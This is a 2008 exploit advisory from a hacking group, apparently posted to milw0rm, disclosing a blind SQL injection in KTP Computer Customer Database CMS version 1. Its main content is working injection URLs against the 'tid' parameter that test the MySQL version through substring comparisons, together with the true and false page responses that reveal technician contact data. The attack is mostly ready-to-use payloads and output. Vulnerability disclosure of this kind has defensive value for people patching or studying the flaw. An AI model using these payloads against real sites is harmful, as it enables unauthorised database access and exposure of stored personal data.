================================================ KTPCCD CMS Blind SQL Injection Vulnerability ================================================ ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 30 November 2008 SITE : cwh.citec.us ##################################################### APPLICATION : APPLICATION : KTP Computer Customer Database CMS VERSION : 1 DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip ##################################################### **Need Magic_quote = Off** --- Blind SQL Injection --- Login as user or Register at http://[Target]/[ktp_path]/?p=tech&a=ntech then goto Exploit... --------- Exploit --------- Test Blind SQL Injection in MYSQL Version 5 [!]True [+] http://[Target]/[ktp_path]/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=5-- Result Home Phone: 122-131-3123 Cell Phone: 123-123-3123 Fax Number: 123-213-1321 A+ Certifcation ID: 312 [!]False [+] http://[Target]/[ktp_path]/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=4-- Result Home Phone: n/a Cell Phone: n/a Fax Number: n/a A+ Certifcation ID: (Technician is not certified) ####################################################################################### Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK Special Thx : asylu3, str0ke, citec.us, milw0rm.com ####################################################################################### # milw0rm.com [2008-11-30]